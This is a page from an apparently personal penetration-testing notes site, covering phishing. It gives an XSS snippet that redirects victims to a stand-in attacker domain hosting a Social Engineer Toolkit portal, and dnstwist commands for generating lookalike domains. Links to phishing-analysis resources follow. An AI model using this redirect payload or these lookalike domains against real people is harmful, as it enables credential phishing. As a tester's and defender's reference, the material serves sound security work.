Pentest Tips
search
⌘Ctrlk
Pentest Tips
  • ABOUT
  • Information Shares
  • CTF
    • Stego
    • Memory
  • Blue Team
    • Tools/Resources
    • One Liners
    • Threat Hunting
    • Scripts
    • Intrusion
  • Web
    • Resources
    • General Web
    • Subdomain Discovery
    • Content Discovery
    • MYSQL
    • Burpsuite
  • Network Exploitation
    • Resources
    • Kerberos
    • Network Based
    • Phishing
    • Metasploit
    • Weaponization
    • Password Cracking
    • Shell Upgrades
    • Linux PrivEsc
    • Windows PrivEsc
    • Windows Persistence
    • Exfiltration
  • Windows Internals
    • Kernal
  • Recon
    • Nmap
    • OSINT
    • SMB Enumeration
    • LDAP
    • Physical
  • Malware
    • Obfuscation
  • Scripting
    • Bash Basics
    • Powershell Basics
  • Cloud
    • AWS
  • Game Hacking
    • Resources
gitbookPowered by GitBook
block-quoteOn this pagechevron-down
githubEdit
  1. Network Exploitation

Phishing

hashtag
Social Engineer Toolkit (SET):

Social Engineer Toolkit (SET)arrow-up-right

From XSS To SET Portal: <script>window.location.replace("http://<attacker Domain>")</script>

hashtag
Generate Similar Domains

dnstwist <domain> > similarDomains.txt
grep -iv "homoglyph" similarDomains.txt > Domains.txt

hashtag
GoPhish

Phishing campaigns made easy:

  • https://getgophish.com/arrow-up-right

hashtag
Analysis

hashtag
Message Headers

  • Google Email Header Analysisarrow-up-right

  • Message Header Analyzerarrow-up-right

  • MailHeader.orgarrow-up-right

hashtag
IP/Web Reputation:

  • ipinfo.ioarrow-up-right

  • https://urlscan.io/arrow-up-right

  • https://talosintelligence.com/reputationarrow-up-right

  • URL2PNGarrow-up-right

  • Wannabrowserarrow-up-right

hashtag
URL Info:

  • https://www.convertcsv.com/url-extractor.htmarrow-up-right

  • https://phishtank.com/?arrow-up-right

hashtag
Attachments (Hashes):

  • https://www.virustotal.com/gui/arrow-up-right

  • https://talosintelligence.com/talos_file_reputationarrow-up-right

hashtag
Sandboxes:

  • https://app.any.run/arrow-up-right

  • https://www.hybrid-analysis.com/arrow-up-right

  • https://www.joesecurity.org/arrow-up-right

  • PhishToolarrow-up-right

hashtag
MX:

  • https://mxtoolbox.com/arrow-up-right

PreviousNetwork Basedchevron-leftNextMetasploitchevron-right

Last updated 3 years ago

  • Social Engineer Toolkit (SET):
  • Generate Similar Domains
  • GoPhish
  • Analysis
  • Message Headers
  • IP/Web Reputation:
  • URL Info:
  • Attachments (Hashes):
  • Sandboxes:
  • MX: